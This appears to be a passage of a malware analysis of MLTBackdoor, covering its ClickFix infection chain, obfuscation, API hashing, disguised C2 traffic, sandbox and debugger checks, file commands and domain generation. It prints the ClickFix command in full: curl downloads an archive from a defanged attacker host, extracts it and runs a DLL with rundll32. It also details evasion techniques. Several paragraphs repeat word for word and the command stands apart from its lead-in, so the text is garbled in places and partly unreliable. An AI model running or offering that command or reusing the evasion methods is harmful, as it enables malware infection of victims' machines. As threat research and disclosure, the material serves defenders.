MLTBackdoor

The infection chain begins with a ClickFix lure on an automotive-related web page. If the victim copies, pastes, and executes the ClickFix content, the following commands are executed

MLTBackdoor hinders analysis by using indirect system calls and API hashing, along with different obfuscation methods applied at compilation time using an LLVM-based obfuscator.

The Mixed Boolean-Arithmetic (MBA) obfuscation technique takes a normal arithmetic expression like x + y and rewrites it as something mathematically equivalent but much more difficult to follow.

MLTBackdoor resolves everything at runtime (Win32 APIs, system calls, and Beacon Object File symbols) using DJB2 hashing.

MLTBackdoor uses a custom encrypted binary protocol over TLS on port 443 with a fixed path ( /api/v1/telemetry ) and User-Agent ( Microsoft-Delivery-Optimization/10.1 ) to masquerade as legitimate traffic.

MLTBackdoor includes multiple anti-analysis techniques to detect debuggers and sandboxed environments, but detection does not halt execution. Instead, MLTBackdoor aggregates the results of 10 distinct checks into a bitmask and sends it as part of its initial request

Checks whether the hypervisor bit is set; if so, queries leaf 0x40000000 to get the vendor ID... Performs a minimum of 5 RDTSC + CPUID + RDTSC loops... Checks if RAM is below 2GB. Checks if the number of processors is 1. Checks whether the uptime is less than 5 minutes.

Debugger check Queries NtQueryInformationProcess with the ProcessDebugPort ProcessInformationClass to detect a debugger.

MLTBackdoor includes a small set of built-in commands: download : Grabs a file from the victim’s machine. upload : Drops a file on the victim’s machine. ls : Lists files in a directory. delete : Deletes a file or folder. rename : Renames or moves a file or folder. mkdir : Creates a new folder.

MLTBackdoor includes multiple anti-analysis techniques to detect debuggers and sandboxed environments, but detection does not halt execution. Instead, MLTBackdoor aggregates the results of 10 distinct checks into a bitmask and sends it as part of its initial request

Checks whether the hypervisor bit is set; if so, queries leaf 0x40000000 to get the vendor ID... Performs a minimum of 5 RDTSC + CPUID + RDTSC loops... Checks if RAM is below 2GB. Checks if the number of processors is 1. Checks whether the uptime is less than 5 minutes.

Debugger check Queries NtQueryInformationProcess with the ProcessDebugPort ProcessInformationClass to detect a debugger.

MLTBackdoor uses a custom encrypted binary protocol over TLS on port 443 with a fixed path ( /api/v1/telemetry ) and User-Agent ( Microsoft-Delivery-Optimization/10.1 ) to masquerade as legitimate traffic.

curl -skLo C:\users\\AppData\Local\Temp\x\t hxxps://hrs2y15sungu[.]com/d&pushd C:\users\\AppData\Local\Temp\x&tar xf t&del t&rundll32 endpointdlp.dll,#2

MLTBackdoor’s DGA algorithm is a deterministic date-based algorithm that generates a new domain per day... The DGA is designed to maintain control of infected systems if the C2s are unreachable.